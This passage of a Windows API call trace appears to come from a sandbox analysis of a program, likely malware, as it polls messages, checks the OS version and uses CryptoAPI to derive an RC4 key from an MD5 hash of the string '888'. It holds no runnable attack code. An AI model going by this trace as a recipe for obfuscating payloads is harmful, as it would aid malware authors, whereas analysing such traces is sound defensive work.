hHeap=0x2af0000) returned 1 [0101.746] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.746] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.747] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.747] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.747] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0101.747] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.747] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743e8 | out: hHeap=0x2af0000) returned 1 [0101.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.747] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.747] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.747] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.747] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0101.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0101.748] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.748] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.748] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0101.748] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.748] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0101.748] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0101.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6e80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0101.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0101.748] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bed58) returned 1 [0101.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.749] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0101.749] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.749] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0101.749] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.749] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.749] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.749] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.749] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.749] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.749] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.750] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0101.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.750] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0101.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.750] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.750] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.750] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.750] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.750] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.750] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.750] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.751] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.751] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.751] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.751] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.751] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.751] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.751] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.751] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.751] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.751] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.751] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.751] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.751] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.751] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.751] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.751] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.751] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.751] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.751] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.751] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.751] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.754] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.754] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9c88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0101.754] CryptCreateHash (in: hProv=0x9bed58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0101.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0101.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0101.754] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0101.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0101.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0101.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.755] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.755] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9ce8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0101.755] CryptHashData (hHash=0x9a3b80, pbData=0x2a71868, dwDataLen=0x3, dwFlags=0x1) returned 1 [0101.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.755] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.755] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.755] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.756] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.756] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.756] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.756] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9da8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0101.756] CryptDeriveKey (in: hProv=0x9bed58, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a46c0) returned 1 [0101.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.756] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.756] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0101.756] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.756] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0101.756] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0101.756] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 